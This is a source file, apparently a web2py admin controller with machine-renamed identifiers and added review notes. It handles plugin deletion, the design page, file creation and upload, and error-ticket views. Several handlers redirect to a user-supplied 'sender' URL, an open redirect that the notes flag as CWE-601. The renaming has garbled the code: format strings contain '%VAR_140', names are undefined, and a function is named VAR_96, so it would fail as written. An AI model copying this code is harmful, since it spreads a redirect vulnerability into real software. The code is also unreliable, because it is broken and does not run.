                   in iteritems(read_possible_languages(VAR_90))
                   if info[2] != 0]) # info[2] is langfile_mtime:
    # Ensure the cron folder and a stub crontab file exist (not on GAE).
    VAR_92 = apath('%VAR_140/cron' % VAR_3, VAR_122=request)
    VAR_93 = apath('%VAR_140/cron/crontab' % VAR_3, VAR_122=request)
    if not is_gae:
        if not os.path.exists(VAR_92):
            os.mkdir(VAR_92)
        if not os.path.exists(VAR_93):
            FUNC_4(VAR_93, '#crontab')
    VAR_94 = []
    def FUNC_62(VAR_95, VAR_94):
        # Split plugin_* entries out of the list, accumulating unique
        # plugin names, and return only the non-plugin entries.
        FUNC_56 += [VAR_70[7:].split('/')[0].split(
            '.')[0] for VAR_70 in VAR_95 if VAR_70.startswith('plugin_')]
        VAR_94[:] = list(set(VAR_94))
        FUNC_56.sort()
        return [VAR_70 for VAR_70 in VAR_95 if not VAR_70.startswith('plugin_')]
    return dict(VAR_3=app,
                VAR_81=FUNC_62(VAR_81, VAR_94),
                VAR_82=defines,
                VAR_51=FUNC_62(VAR_51, VAR_94),
                VAR_83=functions,
                VAR_84=FUNC_62(VAR_84, VAR_94),
                VAR_87=FUNC_62(VAR_87, VAR_94),
                VAR_85=extend,
                VAR_86=include,
                VAR_88=FUNC_62(VAR_88, VAR_94),
                VAR_89=FUNC_62(VAR_89, VAR_94),
                VAR_91=languages,
                VAR_93=crontab,
                VAR_94=FUNC_56)
def FUNC_35():
    """Confirm-and-delete a plugin: removes every file or directory named
    'plugin_<name>.*' across the app's models/views/controllers/static/
    modules/private folders, then redirects back to the design page.

    NOTE(review): the flash messages and return dict reference FUNC_36
    and `dialog`, which are not defined in this scope — mangling
    artifacts (presumably the plugin name and the confirm form).
    """
    VAR_3 = request.args(0)
    VAR_96 = request.args(1)
    VAR_97 = 'plugin_' + VAR_96
    VAR_46 = FORM.confirm(
        T('Delete'),
        {T('Cancel'): URL('design', VAR_98=VAR_3)})
    if VAR_46.accepted:
        try:
            for VAR_168 in ['models', 'views', 'controllers', 'static', 'modules', 'private']:
                VAR_15 = os.path.join(apath(VAR_3, VAR_122=request), VAR_168)
                for VAR_70 in os.listdir(VAR_15):
                    # Match both 'plugin_x.py' and a 'plugin_x' directory.
                    if VAR_70.rsplit('.', 1)[0] == VAR_97:
                        VAR_5 = os.path.join(VAR_15, VAR_70)
                        if os.path.isdir(VAR_5):
                            shutil.rmtree(VAR_5)
                        else:
                            os.unlink(VAR_5)
            session.flash = T('plugin "%(VAR_96)s" deleted',
                              dict(VAR_96=FUNC_36))
        except Exception:
            session.flash = T('unable to FUNC_21 VAR_16 VAR_96 "%(VAR_96)s"',
                              dict(VAR_96=FUNC_36))
        redirect(URL('design', VAR_98=request.args(0), VAR_157=request.vars.id2))
    return dict(VAR_46=dialog, VAR_96=FUNC_36)
def VAR_96():
    """Design page filtered to a single plugin.

    Same inventory as the full design page (models, controllers, views,
    modules, privates, statics, languages, crontab), but FUNC_62 keeps
    only entries matching '^plugin_<name>(/.*|\\..*)?$'.

    NOTE(review): same mangling artifacts as the design page — assigned
    names `models`/`controllers`/`modules`/`crontab` vs. the VAR_81/
    VAR_51/VAR_87/VAR_93 names actually read afterwards, and the return
    dict references undefined `app`, `defines`, `functions`, `extend`,
    `include`, `languages`, `crontab`. Would raise NameError as written;
    verify against the original source.
    """
    VAR_3 = FUNC_5()
    VAR_96 = request.args(1)
    if not VAR_43.flash and VAR_3 == request.application:
        VAR_155 = T('ATTENTION: you cannot FUNC_27 the running application!')
        VAR_43.flash = VAR_155
    if os.path.exists(apath('%VAR_140/compiled' % VAR_3, VAR_122=request)):
        session.flash = \
            T('application is compiled and cannot be designed')
        redirect(URL('site'))
    models = listdir(apath('%VAR_140/VAR_81/' % VAR_3, VAR_122=request), '.*\.py$')
    VAR_81 = [x.replace('\\', '/') for x in VAR_81]
    VAR_82 = {}
    for VAR_156 in VAR_81:
        VAR_2 = FUNC_3(apath('%VAR_140/VAR_81/%s' % (VAR_3, VAR_156), VAR_122=request))
        VAR_82[VAR_156] = re.findall(REGEX_DEFINE_TABLE, VAR_2, re.MULTILINE)
        VAR_82[VAR_156].sort()
    controllers = sorted(
        listdir(apath('%VAR_140/VAR_51/' % VAR_3, VAR_122=request), '.*\.py$'))
    VAR_51 = [x.replace('\\', '/') for x in VAR_51]
    VAR_83 = {}
    for VAR_48 in VAR_51:
        VAR_2 = FUNC_3(apath('%VAR_140/VAR_51/%s' % (VAR_3, VAR_48), VAR_122=request))
        try:
            VAR_95 = find_exposed_functions(VAR_2)
            VAR_83[VAR_48] = VAR_95 and sorted(VAR_95) or []
        except SyntaxError as err:
            VAR_83[VAR_48] = ['SyntaxError:Line:%d' % err.lineno]
    VAR_84 = sorted(
        listdir(apath('%VAR_140/VAR_84/' % VAR_3, VAR_122=request), '[\w/\-]+\.\w+$'))
    VAR_84 = [x.replace('\\', '/') for x in VAR_84]
    VAR_85 = {}
    VAR_86 = {}
    for VAR_48 in VAR_84:
        VAR_2 = FUNC_3(apath('%VAR_140/VAR_84/%s' % (VAR_3, VAR_48), VAR_122=request))
        VAR_95 = re.findall(REGEX_EXTEND, VAR_2, re.MULTILINE)
        if VAR_95:
            VAR_85[VAR_48] = VAR_95[0][1]
        VAR_95 = re.findall(REGEX_INCLUDE, VAR_2)
        VAR_86[VAR_48] = [VAR_111[1] for VAR_111 in VAR_95]
    modules = listdir(apath('%VAR_140/VAR_87/' % VAR_3, VAR_122=request), '.*\.py$')
    VAR_87 = modules = [x.replace('\\', '/') for x in VAR_87]
    modules.sort()
    VAR_88 = listdir(apath('%VAR_140/private/' % VAR_3, VAR_122=request), '[^\.#].*')
    VAR_88 = [x.replace('\\', '/') for x in VAR_88]
    privates.sort()
    VAR_89 = listdir(apath('%VAR_140/static/' % VAR_3, VAR_122=request), '[^\.#].*',
                     maxnum=VAR_1)
    VAR_89 = [x.replace(os.path.sep, '/') for x in VAR_89]
    statics.sort()
    VAR_91 = sorted([VAR_188 + '.py' for VAR_188, info in
                     iteritems(T.get_possible_languages_info())
                     if info[2] != 0]) # info[2] is langfile_mtime:
    crontab = apath('%VAR_140/cron/crontab' % VAR_3, VAR_122=request)
    if not os.path.exists(VAR_93):
        FUNC_4(VAR_93, '#crontab')
    def FUNC_62(VAR_95):
        # Keep only this plugin's files: plugin_<name>, plugin_<name>.ext,
        # or anything under plugin_<name>/.
        VAR_32 = re.compile('^plugin_' + VAR_96 + '(/.*|\..*)?$')
        return [VAR_70 for VAR_70 in VAR_95 if VAR_70 and VAR_32.match(VAR_70)]
    return dict(VAR_3=app,
                VAR_81=FUNC_62(VAR_81),
                VAR_82=defines,
                VAR_51=FUNC_62(VAR_51),
                VAR_83=functions,
                VAR_84=FUNC_62(VAR_84),
                VAR_87=FUNC_62(VAR_87),
                VAR_85=extend,
                VAR_86=include,
                VAR_88=FUNC_62(VAR_88),
                VAR_89=FUNC_62(VAR_89),
                VAR_91=languages,
                VAR_93=crontab)
def FUNC_37():
    """Create a new source file in an application folder.

    After a CSRF token check, sanitizes the requested filename, picks a
    per-folder template body (plural rules, language file, model,
    controller, view, module, static/private), writes the file, logs the
    CREATE event, and redirects to the editor (or returns an ajax
    payload when created from the files menu).

    NOTE(review): SECURITY — `redirect(request.vars.sender + VAR_157)`
    sends the browser to a fully user-controlled URL (open redirect,
    CWE-601); the target should be validated/restricted to this host.
    NOTE(review): mangled identifiers — `filename` in the language-file
    flash, `text` in the controller branch, and `vars` in the final
    redirect are undefined in this scope; presumably VAR_5/VAR_112/
    VAR_17 before renaming. Verify upstream.
    """
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    try:
        VAR_157 = '#' + request.vars.id if request.vars.id else ''
        if request.vars.app:
            VAR_3 = FUNC_5(request.vars.app)
            VAR_15 = abspath(request.vars.location)
        else:
            if request.vars.dir:
                request.vars.location += request.vars.dir + '/'
            VAR_3 = FUNC_5(VAR_10=request.vars.location.split('/')[0])
            VAR_15 = apath(request.vars.location, VAR_122=request)
        # Sanitize: collapse anything outside [\w./-] to underscores.
        VAR_5 = re.sub('[^\w./-]+', '_', request.vars.filename)
        if VAR_15[-7:] == '/rules/':
            if len(VAR_5) == 0:
                raise SyntaxError
            if not VAR_5[-3:] == '.py':
                VAR_5 += '.py'
            VAR_188 = re.match('^plural_rules-(.*)\.py$', VAR_5).group(1)
            VAR_189 = read_possible_languages(apath(VAR_3, VAR_122=request))[VAR_188]
            VAR_112 = dedent("""
            VAR_75=2 # for example, English language has 2 VAR_148:
            get_plural_id = lambda VAR_173: int(VAR_173 != 1)
            construct_plural_form = lambda word, plural_id: word
            """)[1:] % dict(VAR_188=VAR_189[0], langname=VAR_189[1])
        elif VAR_15[-11:] == '/VAR_91/':
            if len(VAR_5) == 0:
                raise SyntaxError
            if not VAR_5[-3:] == '.py':
                VAR_5 += '.py'
            VAR_15 = os.path.join(apath(VAR_3, VAR_122=request), 'languages', VAR_5)
            if not os.path.exists(VAR_15):
                FUNC_4(VAR_15, '')
            # Populate the new language file by scanning the app's sources.
            findT(apath(VAR_3, VAR_122=request), VAR_5[:-3])
            session.flash = T('language VAR_16 "%(VAR_5)s" VAR_175/updated',
                              dict(VAR_5=filename))
            redirect(request.vars.sender + VAR_157)
        elif VAR_15[-8:] == '/VAR_81/':
            if not VAR_5[-3:] == '.py':
                VAR_5 += '.py'
            if len(VAR_5) == 3:
                raise SyntaxError
            VAR_112 = '# -*- coding: utf-8 -*-\n'
        elif VAR_15[-13:] == '/VAR_51/':
            if not VAR_5[-3:] == '.py':
                VAR_5 += '.py'
            if len(VAR_5) == 3:
                raise SyntaxError
            VAR_112 = '# -*- coding: utf-8 -*-\VAR_173# %VAR_140\ndef VAR_197(): return dict(message="hello from %s")'
            VAR_112 = text % (T('try something like'), VAR_5)
        elif VAR_15[-7:] == '/VAR_84/':
            if request.vars.plugin and not VAR_5.startswith('plugin_%VAR_140/' % request.vars.plugin):
                VAR_5 = 'plugin_%VAR_140/%s' % (request.vars.plugin, VAR_5)
            if VAR_5.find('.') < 0:
                VAR_5 += '.html'
            VAR_50 = VAR_5.split('.')[-1].lower()
            if len(VAR_5) == 5:
                raise SyntaxError
            VAR_155 = T(
                'This is the %(VAR_5)VAR_140 template', dict(VAR_5=filename))
            if VAR_50 == 'html':
                VAR_112 = dedent("""
                {{VAR_85 'layout.html'}}
                <h1>%VAR_140</h1>
                {{=BEAUTIFY(VAR_43._vars)}}""" % VAR_155)[1:]
            else:
                # Non-HTML view: seed from the matching generic.<ext> if any.
                VAR_222 = os.path.join(VAR_15, 'generic.' + VAR_50)
                if os.path.exists(VAR_222):
                    VAR_112 = read_file(VAR_222)
                else:
                    VAR_112 = ''
        elif VAR_15[-9:] == '/VAR_87/':
            if request.vars.plugin and not VAR_5.startswith('plugin_%VAR_140/' % request.vars.plugin):
                VAR_5 = 'plugin_%VAR_140/%s' % (request.vars.plugin, VAR_5)
            if not VAR_5[-3:] == '.py':
                VAR_5 += '.py'
            if len(VAR_5) == 3:
                raise SyntaxError
            VAR_112 = dedent("""
            from gluon import *\n""")[1:]
        elif (VAR_15[-8:] == '/static/') or (VAR_15[-9:] == '/private/'):
            if (request.vars.plugin and
                    not VAR_5.startswith('plugin_%VAR_140/' % request.vars.plugin)):
                VAR_5 = 'plugin_%VAR_140/%s' % (request.vars.plugin, VAR_5)
            VAR_112 = ''
        else:
            # Unknown target folder: bounce back to the caller.
            # NOTE(review): user-controlled redirect target (CWE-601).
            redirect(request.vars.sender + VAR_157)
        VAR_158 = os.path.join(VAR_15, VAR_5)
        VAR_159 = os.path.dirname(VAR_158)
        if not os.path.exists(VAR_159):
            os.makedirs(VAR_159)
        # Refuse to overwrite an existing file.
        if os.path.exists(VAR_158):
            raise SyntaxError
        FUNC_4(VAR_158, VAR_112)
        FUNC_1(VAR_3, 'CREATE', VAR_5)
        if request.vars.dir:
            VAR_110 = T('file "%(VAR_5)s" created',
                        dict(VAR_5=VAR_158[len(VAR_15):]))
        else:
            session.flash = T('file "%(VAR_5)s" created',
                              dict(VAR_5=VAR_158[len(VAR_15):]))
        VAR_17 = {}
        if request.vars.id:
            VAR_17['id'] = request.vars.id
        if request.vars.app:
            VAR_17['app'] = request.vars.app
        redirect(URL('edit',
                     VAR_98=[os.path.join(request.vars.location, VAR_5)], VAR_17=vars))
    except Exception as VAR_114:
        # redirect() raises HTTP, which must pass through untouched.
        if not isinstance(VAR_114, HTTP):
            session.flash = T('cannot create file')
    if request.vars.dir:
        # Ajax path: refresh the files menu and open the new file.
        VAR_43.flash = VAR_110
        VAR_43.headers['web2py-VAR_126-content'] = 'append'
        VAR_43.headers['web2py-VAR_126-command'] = "%VAR_140 %VAR_140 %s" % (
            "$.web2py.invalidate('#files_menu');",
            "load_file('%s');" % URL('edit', VAR_98=[VAR_3, request.vars.dir, VAR_5]),
            "$.web2py.enableElement($('#VAR_26 form').find($.web2py.formInputClickSelector));")
        return ''
    else:
        # NOTE(review): user-controlled redirect target (CWE-601).
        redirect(request.vars.sender + VAR_157)
def FUNC_38(VAR_3, VAR_13, VAR_14='.*\.py$'):
    """List files under <app>/<dir> matching regex VAR_14 (default *.py),
    with backslashes normalized to '/' and *.bak backups excluded.
    Relies on the web2py globals `listdir`, `apath`, and `request`.
    """
    VAR_45 = sorted(
        listdir(apath('%(VAR_3)VAR_140/%(VAR_13)VAR_140/' % {'app': VAR_3, 'dir': VAR_13}, VAR_122=request), VAR_14))
    VAR_45 = [x.replace('\\', '/') for x in VAR_45 if not x.endswith('.bak')]
    return VAR_45
def FUNC_39(VAR_15, VAR_16, VAR_17={}, VAR_3=None):
    """Build an editor link (an A helper) for a file in the files menu.

    NOTE(review): `VAR_17={}` is a mutable default argument (shared
    across calls) — it is only read here, but fragile. The URL() call
    references `args` and `vars`, which are undefined locals (the
    builtin `vars` would be passed otherwise) — presumably VAR_98/VAR_17
    before mangling. Verify upstream before use.
    """
    VAR_98 = (VAR_15, VAR_16) if 'app' in VAR_17 else (VAR_3, VAR_15, VAR_16)
    VAR_99 = URL('edit', VAR_98=args, VAR_17=vars)
    return A(VAR_16, VAR_144='editor_filelink', _href=VAR_99, _style='word-wrap: nowrap;')
def FUNC_40():
    """Build the collapsible per-folder file menu for the web IDE.

    For each source folder (models/controllers/views/modules/static/
    private, each with its own filename regex) it emits an LI header
    that toggles a hidden UL of editor links (via FUNC_39/FUNC_38).

    NOTE(review): the return references `result_files`, undefined here —
    presumably VAR_100 before mangling; would raise NameError as written.
    """
    VAR_3 = request.vars.app or 'welcome'
    VAR_65 = [{'name': 'models', 'reg': '.*\.py$'},
              {'name': 'controllers', 'reg': '.*\.py$'},
              {'name': 'views', 'reg': '[\w/\-]+(\.\w+)+$'},
              {'name': 'modules', 'reg': '.*\.py$'},
              {'name': 'static', 'reg': '[^\.#].*'},
              {'name': 'private', 'reg': '.*\.py$'}]
    VAR_100 = []
    for VAR_13 in VAR_65:
        VAR_100.append(TAG[''](LI(VAR_13['name'], VAR_144="nav-header component", _onclick="collapse('" + VAR_13['name'] + "_files');"),
                               LI(UL(*[LI(FUNC_39(VAR_13['name'], VAR_221, dict(id=VAR_13['name'] + VAR_221.replace('.', '__')), VAR_3), _style="overflow:hidden", _id=VAR_13['name'] + "__" + VAR_221.replace('.', '__'))
                                       for VAR_221 in FUNC_38(VAR_3, VAR_13['name'], VAR_14=VAR_13['reg'])],
                                     VAR_144="nav nav-list small-font"),
                                  _id=VAR_13['name'] + '_files', _style="display: none;")))
    return dict(VAR_100=result_files)
def FUNC_41():
    """Handle a file upload into an application folder.

    After a CSRF token check, sanitizes or derives the target filename,
    appends the conventional extension for the destination folder
    (.py for models/modules/controllers/languages, .html for views),
    writes the uploaded bytes, logs the UPLOAD event, and redirects
    back to the sender.

    NOTE(review): SECURITY — `redirect(request.vars.sender)` uses a
    fully user-controlled URL (open redirect, CWE-601); validate first.
    NOTE(review): the flash messages reference `filename`, undefined in
    this scope (VAR_5 before mangling, presumably).
    """
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    try:
        VAR_5 = None
        VAR_3 = FUNC_5(VAR_10=request.vars.location.split('/')[0])
        VAR_15 = apath(request.vars.location, VAR_122=request)
        if request.vars.filename:
            VAR_5 = re.sub('[^\w\./]+', '_', request.vars.filename)
        else:
            VAR_5 = os.path.split(request.vars.file.filename)[-1]
        if VAR_15[-8:] == '/VAR_81/' and not VAR_5[-3:] == '.py':
            VAR_5 += '.py'
        if VAR_15[-9:] == '/VAR_87/' and not VAR_5[-3:] == '.py':
            VAR_5 += '.py'
        if VAR_15[-13:] == '/VAR_51/' and not VAR_5[-3:] == '.py':
            VAR_5 += '.py'
        if VAR_15[-7:] == '/VAR_84/' and not VAR_5[-5:] == '.html':
            VAR_5 += '.html'
        if VAR_15[-11:] == '/VAR_91/' and not VAR_5[-3:] == '.py':
            VAR_5 += '.py'
        VAR_5 = os.path.join(VAR_15, VAR_5)
        VAR_159 = os.path.dirname(VAR_5)
        if not os.path.exists(VAR_159):
            os.makedirs(VAR_159)
        VAR_2 = request.vars.file.file.read()
        VAR_160 = FUNC_0(VAR_2)
        FUNC_4(VAR_5, VAR_2, 'wb')
        FUNC_1(VAR_3, 'UPLOAD', VAR_5, VAR_160)
        session.flash = T('file "%(VAR_5)s" uploaded',
                          dict(VAR_5=filename[len(VAR_15):]))
    except Exception:
        if VAR_5:
            VAR_68 = dict(VAR_5=filename[len(VAR_15):])
        else:
            VAR_68 = dict(VAR_5='unknown')
        session.flash = T('cannot upload VAR_16 "%(VAR_5)s"', VAR_68)
    # NOTE(review): user-controlled redirect target (CWE-601).
    redirect(request.vars.sender)
def FUNC_42():
    """Error-ticket browser for an application.

    Dispatches on a 'method' derived from request.args(1):
      * 'new'   — group on-disk tickets (app/errors/*) by md5 of their
                  traceback, deleting any the user checked ('delete_*'
                  request vars), and return them sorted by frequency.
      * 'dbnew' — same grouping, but tickets come from the DB table
                  returned by FUNC_43; broken rows are deleted.
      * 'dbold' — flat list of DB tickets, newest first.
      * else    — flat list of on-disk tickets sorted by mtime.
    On GAE only the db* methods are offered.

    Fix: the original body had `import .hashlib`, which is a
    SyntaxError (relative imports are only valid in the
    `from ... import` form); corrected to `import hashlib`.

    NOTE(review): several mangled identifiers remain and are undefined
    in this scope as written — `db_ready` (vs. VAR_101), `method`,
    `app`, `tickets`, `times`, `last_line`, `hash` (builtin shadow
    intended?) — verify against the original web2py admin controller.
    """
    import operator
    import os
    import hashlib  # was `import .hashlib`, a SyntaxError
    VAR_3 = FUNC_5()
    if is_gae:
        VAR_161 = 'dbold' if ('old' in
                              (request.args(1) or '')) else 'dbnew'
    else:
        VAR_161 = request.args(1) or 'new'
    VAR_101 = {}
    db_ready['status'] = FUNC_43(VAR_3)
    VAR_101['errmessage'] = T(
        "No ticket_storage.txt found under /private folder")
    VAR_101['errlink'] = "http://web2py.com/books/default/chapter/29/13#Collecting-tickets"
    if VAR_161 == 'new':
        VAR_162 = apath('%VAR_140/errors' % VAR_3, VAR_122=request)
        VAR_163 = []
        # Collect the ticket hashes the user asked to delete.
        for VAR_70 in request.vars:
            if VAR_70[:7] == 'delete_':
                VAR_163.append(VAR_70[7:])
        VAR_164 = dict()
        for fn in listdir(VAR_162, '^[VAR_7-fA-F0-9.\-]+$'):
            VAR_190 = os.path.join(VAR_162, fn)
            if not os.path.isfile(VAR_190):
                continue
            try:
                VAR_205 = FUNC_2(VAR_190, 'rb')
                try:
                    VAR_125 = pickle.load(VAR_205)
                finally:
                    VAR_205.close()
            except IOError:
                continue
            except EOFError:
                continue
            # Group identical failures by md5 of the traceback text.
            VAR_191 = hashlib.md5(to_bytes(VAR_125['traceback'])).hexdigest()
            if VAR_191 in VAR_163:
                os.unlink(VAR_190)
            else:
                try:
                    VAR_164[VAR_191]['count'] += 1
                except KeyError:
                    VAR_218 = VAR_125['traceback'].split("\n")
                    VAR_219 = VAR_218[-2] if len(VAR_218) > 1 else 'unknown'
                    VAR_220 = os.path.split(VAR_125['layer'])[1]
                    VAR_164[VAR_191] = dict(count=1, pickel=VAR_125,
                                            causer=VAR_220,
                                            VAR_219=last_line,
                                            VAR_191=hash, VAR_113=fn)
        # Most frequent failure groups first.
        VAR_165 = [(x['count'], x) for x in VAR_164.values()]
        VAR_165.sort(VAR_143=operator.itemgetter(0), reverse=True)
        return dict(FUNC_42=[x[1] for x in VAR_165], VAR_3=VAR_3, VAR_161=method, VAR_101=db_ready)
    elif VAR_161 == 'dbnew':
        VAR_162 = apath('%VAR_140/errors' % VAR_3, VAR_122=request)
        VAR_192, VAR_193 = FUNC_43(VAR_3)
        VAR_163 = []
        for VAR_70 in request.vars:
            if VAR_70[:7] == 'delete_':
                VAR_163.append(VAR_70[7:])
        VAR_164 = dict()
        for fn in VAR_192(VAR_193.id > 0).select():
            try:
                VAR_125 = pickle.loads(fn.ticket_data)
                VAR_191 = hashlib.md5(VAR_125['traceback']).hexdigest()
                if VAR_191 in VAR_163:
                    VAR_192(VAR_193.id == fn.id).delete()
                    VAR_192.commit()
                else:
                    try:
                        VAR_164[VAR_191]['count'] += 1
                    except KeyError:
                        VAR_218 = VAR_125['traceback'].split("\n")
                        VAR_219 = VAR_218[-2]
                        VAR_220 = os.path.split(VAR_125['layer'])[1]
                        VAR_164[VAR_191] = dict(count=1,
                                                pickel=VAR_125, causer=VAR_220,
                                                VAR_219=last_line, VAR_191=hash,
                                                VAR_113=fn.ticket_id)
            except AttributeError as VAR_114:
                # Unreadable/stale row: drop it.
                VAR_192(VAR_193.id == fn.id).delete()
                VAR_192.commit()
        VAR_165 = [(x['count'], x) for x in VAR_164.values()]
        VAR_165.sort(VAR_143=operator.itemgetter(0), reverse=True)
        return dict(FUNC_42=[x[1] for x in VAR_165], VAR_3=app,
                    VAR_161=method, VAR_101=db_ready)
    elif VAR_161 == 'dbold':
        VAR_192, VAR_193 = FUNC_43(VAR_3)
        for VAR_70 in request.vars:
            if VAR_70[:7] == 'delete_':
                VAR_192(VAR_193.ticket_id == VAR_70[7:]).delete()
                VAR_192.commit()
        VAR_206 = VAR_192(VAR_193.id > 0).select(VAR_193.ticket_id,
                                                 VAR_193.created_datetime,
                                                 orderby=~VAR_193.created_datetime)
        VAR_207 = [row.ticket_id for row in VAR_206]
        VAR_208 = dict([(row.ticket_id, row.created_datetime) for
                        row in VAR_206])
        return dict(VAR_3=VAR_3, VAR_207=tickets, VAR_161=method,
                    VAR_208=times, VAR_101=db_ready)
    else:
        for VAR_70 in request.vars:
            if VAR_70[:7] == 'delete_' and (not VAR_70 == "delete_all}"):
                os.unlink(apath('%VAR_140/FUNC_42/%s' % (VAR_3, VAR_70[7:]), VAR_122=request))
        # Sort remaining on-disk tickets newest-first by mtime.
        VAR_209 = lambda p: os.stat(apath('%VAR_140/FUNC_42/%s' %
                                          (VAR_3, p), VAR_122=request)).st_mtime
        VAR_207 = sorted(
            listdir(apath('%VAR_140/FUNC_42/' % VAR_3, VAR_122=request), '^\w.*'),
            VAR_143=VAR_209,
            reverse=True)
        return dict(VAR_3=VAR_3, VAR_207=tickets, VAR_161=method, VAR_101=db_ready)
def FUNC_43(VAR_3):
    """Open (creating if needed) the per-app error-ticket database.

    Reads the DAL connection string from <app>/private/ticket_storage.txt
    (falls back to 'google:datastore' on GAE; returns False if neither
    exists), defines the web2py_ticket_<app> table when absent, and
    returns (db, table).

    NOTE(review): `db_string.strip()` references an undefined name —
    presumably VAR_166 before mangling; would raise NameError when the
    storage file exists. Verify upstream.
    """
    VAR_102 = apath('%VAR_140/private' % VAR_3, VAR_122=request)
    VAR_103 = os.path.join(VAR_102, 'ticket_storage.txt')
    if os.path.exists(VAR_103):
        VAR_166 = FUNC_3(VAR_103)
        VAR_166 = db_string.strip().replace('\r', '').replace('\n', '')
    elif is_gae:
        VAR_166 = "google:datastore"
    else:
        return False
    VAR_104 = 'web2py_ticket'
    VAR_105 = VAR_104 + '_' + VAR_3
    VAR_106 = apath('%VAR_140/databases' % VAR_3, VAR_122=request)
    VAR_107 = DAL(VAR_166, VAR_168=VAR_106, auto_import=True)
    if not VAR_107.get(VAR_105):
        VAR_167 = VAR_107.define_table(
            VAR_105,
            Field('ticket_id', length=100),
            Field('ticket_data', 'text'),
            Field('created_datetime', 'datetime'),
        )
    return VAR_107, VAR_107.get(VAR_105)
def FUNC_44(VAR_15):
    """Turn an absolute path from a traceback into an admin edit link.

    If the path exists and sits under this app's controllers/models/
    views folder with the matching extension, returns the XML of an
    anchor pointing at the admin 'edit' action; otherwise ''.
    """
    VAR_108 = VAR_15.replace('\\', '/')
    if os.path.isabs(VAR_108) and os.path.isfile(VAR_108):
        (VAR_168, VAR_5) = os.path.split(VAR_108)
        (VAR_11, VAR_169) = os.path.splitext(VAR_5)
        VAR_3 = FUNC_5()
        # folder-name -> expected extension for editable sources
        VAR_170 = {'controllers': '.py', 'models': '.py', 'views': '.html'}
        for VAR_143 in VAR_170.keys():
            VAR_194 = VAR_168.endswith("%VAR_140/%s" % (VAR_3, VAR_143))
            if VAR_169.lower() == VAR_170[VAR_143] and VAR_194:
                return to_native(A('"' + VAR_108 + '"',
                                   _href=URL(VAR_122=request,
                                             VAR_221='edit/%VAR_140/%VAR_140/%s' % (VAR_3, VAR_143, VAR_5))).xml())
    return ''
def FUNC_45(VAR_18):
    """Rewrite double-quoted path substrings in a traceback as edit links.

    Splits the text on '"'; every odd-indexed piece is a candidate path
    passed to FUNC_44. Linkable pieces are replaced by the anchor markup
    (and the following literal piece is appended, consuming the closing
    quote); non-linkable pieces are re-emitted with their quote intact.
    """
    VAR_109 = VAR_18.split('"')
    VAR_110 = (len(VAR_109) != 0) and VAR_109[0] or ''
    VAR_111 = 1
    while VAR_111 < len(VAR_109):
        VAR_171 = FUNC_44(VAR_109[VAR_111])
        if VAR_171 == '':
            # Not a recognized source path: keep the original quoting.
            VAR_110 += '"' + VAR_109[VAR_111]
        else:
            VAR_110 += VAR_171
            if VAR_111 + 1 < len(VAR_109):
                VAR_110 += VAR_109[VAR_111 + 1]
                VAR_111 = VAR_111 + 1
        VAR_111 = VAR_111 + 1
    return VAR_110
class CLASS_0(object):
    """Wrap source text as syntax-highlighted XML (via the web2py CODE
    helper) with file paths rewritten into admin edit links (FUNC_45).
    FUNC_63 — presumably the original xml()/str accessor — returns the
    rendered markup string.
    """
    def __init__(self, VAR_112):
        self.s = FUNC_45(CODE(VAR_112).xml())
    def FUNC_63(self):
        return self.s
def VAR_113():
    """Display a single error ticket loaded from disk.

    Expects request.args = [app, ticket_id]; loads the ticket into a
    RestrictedError and returns its output, traceback (linkified via
    CLASS_0), snapshot, code, and layer for the view.

    NOTE(review): `app`, `FUNC_46`, and `myversion` in the return dict
    are undefined in this scope — mangling artifacts (presumably the
    app name, ticket id, and web2py version locals). Verify upstream.
    """
    if len(request.args) != 2:
        session.flash = T('invalid ticket')
        redirect(URL('site'))
    VAR_3 = FUNC_5()
    VAR_27 = request.env.web2py_version
    VAR_113 = request.args[1]
    VAR_114 = RestrictedError()
    VAR_114.load(request, VAR_3, VAR_113)
    return dict(VAR_3=app,
                VAR_113=FUNC_46,
                VAR_67=VAR_114.output,
                VAR_18=(VAR_114.traceback and CLASS_0(VAR_114.traceback)),
                snapshot=VAR_114.snapshot,
                VAR_180=VAR_114.code,
                layer=VAR_114.layer,
                VAR_27=myversion)
def FUNC_47():
    """Display a single error ticket stored in the ticket database.

    Same as the disk-based ticket view, but first attaches the ticket
    DB (FUNC_43) to the request so RestrictedError.load reads from it,
    and reuses the 'default/ticket.html'-style view.

    NOTE(review): `app`, `FUNC_46`, and `myversion` in the return dict
    are undefined here — mangling artifacts. Verify upstream.
    """
    if len(request.args) != 2:
        session.flash = T('invalid ticket')
        redirect(URL('site'))
    VAR_3 = FUNC_5()
    VAR_27 = request.env.web2py_version
    VAR_113 = request.args[1]
    VAR_114 = RestrictedError()
    request.tickets_db = FUNC_43(VAR_3)[0]
    VAR_114.load(request, VAR_3, VAR_113)
    VAR_43.view = 'default/VAR_113.html'
    return dict(VAR_3=app,
                VAR_113=FUNC_46,
                VAR_67=VAR_114.output,
                VAR_18=(VAR_114.traceback and CLASS_0(VAR_114.traceback)),
                snapshot=VAR_114.snapshot,
                VAR_180=VAR_114.code,
                layer=VAR_114.layer,
                VAR_27=myversion)
def VAR_125():
    """Deliberately raise to generate a sample error ticket for testing."""
    raise RuntimeError('admin VAR_113 generator at your service')
def FUNC_49():
    """Rescan the app's sources and refresh all language files, then
    redirect back to the design page's languages section."""
    VAR_3 = FUNC_5()
    update_all_languages(apath(VAR_3, VAR_122=request))
    session.flash = T('Language VAR_45 (static VAR_71) updated')
    redirect(URL('design', VAR_98=VAR_3, VAR_157='languages'))
def FUNC_50():
    """Auth endpoint for multi-user mode.

    The very first registered user skips approval (so an admin always
    exists); outside multi-user mode the form just says 'Disabled'.
    """
    if MULTI_USER_MODE:
        if not db(db.auth_user).count():
            auth.settings.registration_requires_approval = False
        return dict(VAR_26=auth())
    else:
        return dict(VAR_26=T("Disabled"))
def FUNC_51():
    """Reload the URL rewrite rules (routes) and go back to the site page."""
    gluon.rewrite.load()
    redirect(URL('site'))
def FUNC_52():
    """Manager-only user administration grid (multi-user mode).

    Makes registration_key editable so a manager can approve/block
    users, and returns locals() so the SQLFORM.grid reaches the view.
    """
    if not (MULTI_USER_MODE and is_manager()):
        session.flash = T('Not Authorized')
        redirect(URL('site'))
    db.auth_user.registration_key.writable = True
    VAR_115 = SQLFORM.grid(db.auth_user)
    return locals()
def FUNC_53():
    """Manager-only bulk registration: one email per textarea line.

    Inserts an auth_user row for each email not already present and
    flashes the count of newly registered students.
    """
    if not (MULTI_USER_MODE and is_manager()):
        session.flash = T('Not Authorized')
        redirect(URL('site'))
